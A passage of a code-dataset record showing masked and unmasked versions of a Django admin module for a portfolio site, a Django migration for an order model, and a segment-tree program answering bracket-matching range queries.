"step-2": "<mask token>\n\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n list_display_links = 'descricao',\n search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CaracteristicaServicoAdmin(CustomModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n list_display_links = 'descricao',\n search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass CaracteristicaServicoAdmin(CustomModelAdmin):\n list_display = 'descricao',\n search_fields = ['descricao']\n exclude = ['slug']\n\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n list_display_links = 'descricao',\n search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
"step-5": "#coding=utf-8\n'''\nCreated on 04/09/2012\n\n@author: Johnny\n'''\nfrom ckeditor.widgets import CKEditorWidget\nfrom django.conf.urls import patterns, url\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.templatetags.static import static\nimport views\nfrom portfolio.models import *\nfrom custom_admin import custom_admin\nfrom custom_admin.custom_model_admin import CustomModelAdmin\nfrom django import forms\n\nclass CaracteristicaServicoAdmin(CustomModelAdmin):\n list_display = ('descricao',)\n search_fields = ['descricao']\n exclude = ['slug']\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n class Meta:\n model = Servico\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = ('imagem_icone','titulo','intro',)\n list_display_links = ('titulo','intro',)\n search_fields = ['titulo','intro','descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n\n def configuracoes_servicos_view(self,request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n\n add, change = True,False\n\n if request.method == 'POST': # If the form has been submitted...\n\n form = forms.ConfigServicoForm(request.POST,request.FILES) # A form bound to the POST data\n\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n\n if form.is_valid(): # All validation rules pass\n\n form.fields['imagem'].required = True\n\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n\n if texto.texto == None or texto.texto != form.cleaned_data['texto']:\n texto.texto = form.cleaned_data['texto']\n\n if not request.POST.has_key('_update') or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n\n\n\n texto.slug = 'texto_servico'\n texto.save()\n\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n\n adminForm = helpers.AdminForm(form,[('Texto da página de serviços',{'fields':['imagem','texto']})],prepopuled_fields)\n\n media = self.media + adminForm.media\n\n return render_to_response('admin/config_form.html',\n {\n 'add':add,\n 'change':change,\n 'title': 'Configurações',\n 'is_popup': \"_popup\" in request.REQUEST,\n 'show_delete': False,\n 'has_delete_permission':False,\n 'has_add_permission':True,\n 'has_change_permission':True,\n 'errors': form.errors,\n 'app_label': opts.app_label,\n 'current_app':capitalize(opts.app_label),\n 'all_app_list':self.admin_site.all_app_list(request),\n 'module_name': force_unicode(opts.verbose_name_plural),\n 'opts':opts,\n 'has_file_field':True,\n 'adminform':adminForm,\n 'save_as':False,\n 'media':media,\n }\n ,context_instance=RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('',\n url(r'^config/$', custom_admin.custom_site.admin_view(self.configuracoes_servicos_view),name='%s_%s_config' % info),\n )\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n\n js = [\n 'cufon-yui.js',\n 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js',\n ]\n\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n\n media = super_media + current_media\n\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request) and self.has_add_permission(request)\n return permiss\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = ('imagem_icone','descricao','site')\n list_display_links = ('descricao',)\n search_fields = ['site','descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n class Meta:\n model = Trabalho\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = ('titulo','descricao_pequena','servico','cliente')\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\ncustom_admin.custom_site.register(Cliente,ClientesAdmin)\ncustom_admin.custom_site.register(CaracteristicaServico,CaracteristicaServicoAdmin)\ncustom_admin.custom_site.register(Servico,ServicosAdmin)\ncustom_admin.custom_site.register(Trabalho,TrabalhoAdmin)\n",
"step-ids": [
13,
14,
15,
16,
19
]
}
|
[
13,
14,
15,
16,
19
] |
# Generated by Django 3.2.6 on 2021-10-10 17:17
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reward', '0002_delete_user'),
]
operations = [
migrations.CreateModel(
name='order',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
('created_date', models.DateField(auto_now_add=True)),
('points', models.IntegerField(blank=True, default=0, null=True)),
('green_rating', models.CharField(choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), ('4', 'rating 4'), ('5', 'rating 5')], max_length=200)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
normal
|
{
"blob_id": "8cec6778f530cb06e4f6cb2e6e9b6cb192d20f97",
"index": 3280,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('reward', '0002_delete_user')]\n operations = [migrations.CreateModel(name='order', fields=[('id',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False, unique=True)), ('created_date', models.\n DateField(auto_now_add=True)), ('points', models.IntegerField(blank\n =True, default=0, null=True)), ('green_rating', models.CharField(\n choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), (\n '4', 'rating 4'), ('5', 'rating 5')], max_length=200)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('reward', '0002_delete_user')]\n operations = [migrations.CreateModel(name='order', fields=[('id',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False, unique=True)), ('created_date', models.\n DateField(auto_now_add=True)), ('points', models.IntegerField(blank\n =True, default=0, null=True)), ('green_rating', models.CharField(\n choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), (\n '4', 'rating 4'), ('5', 'rating 5')], max_length=200)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 3.2.6 on 2021-10-10 17:17\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('reward', '0002_delete_user'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='order',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),\n ('created_date', models.DateField(auto_now_add=True)),\n ('points', models.IntegerField(blank=True, default=0, null=True)),\n ('green_rating', models.CharField(choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), ('4', 'rating 4'), ('5', 'rating 5')], max_length=200)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
<|reserved_special_token_0|>
constructST(s, 0, n - 1, st, 0)
for _ in range(int(input())):
l, r = map(int, input().split())
print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
s = input()
n = len(s)
x = int(ceil(log2(n)))
max_size = 2 * pow(2, x) - 1
st = [(0) for i in range(0, max_size)]
openst = [(0) for i in range(0, max_size)]
closedst = [(0) for i in range(0, max_size)]
constructST(s, 0, n - 1, st, 0)
for _ in range(int(input())):
l, r = map(int, input().split())
print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])
<|reserved_special_token_1|>
from math import ceil, log2, sqrt
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
s = input()
n = len(s)
x = int(ceil(log2(n)))
max_size = 2 * pow(2, x) - 1
st = [(0) for i in range(0, max_size)]
openst = [(0) for i in range(0, max_size)]
closedst = [(0) for i in range(0, max_size)]
constructST(s, 0, n - 1, st, 0)
for _ in range(int(input())):
l, r = map(int, input().split())
print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])
<|reserved_special_token_1|>
from math import ceil, log2, sqrt
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start+end)//2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2*i+1)
a, b, c = constructST(s, mid+1, end, st, 2*i+2)
tmp = min(openst[2*i+1], closedst[2*i+2])
st[i] += tmp + a
openst[i] += b-tmp
closedst[i] += c -tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end)//2
a, b, c = query(s, start, mid, l, r, st, 2*i+1)
d, e, f = query(s, mid+1, end, l, r, st, 2*i+2)
tmp = min(b, f)
T = a+d +tmp
O = b+e - tmp
C = c+f - tmp
return T, O, C
s = input()
n = len(s)
x = int(ceil(log2(n)))
max_size = 2*pow(2, x) -1
st = [0 for i in range(0, max_size)]
openst = [0 for i in range(0, max_size)]
closedst = [0 for i in range(0, max_size)]
constructST(s, 0, n-1, st, 0)
# print(st)
# print(openst)
# print(closedst)
for _ in range(int(input())):
l, r = map(int, input().split())
print(2*query(s, 0, n-1, l-1, r-1, st, 0)[0])
|
flexible
|
{
"blob_id": "ccc74f58eff3bb00f0be8c2c963de4208b7f0933",
"index": 9125,
"step-1": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n",
"step-3": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n",
"step-4": "from math import ceil, log2, sqrt\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, 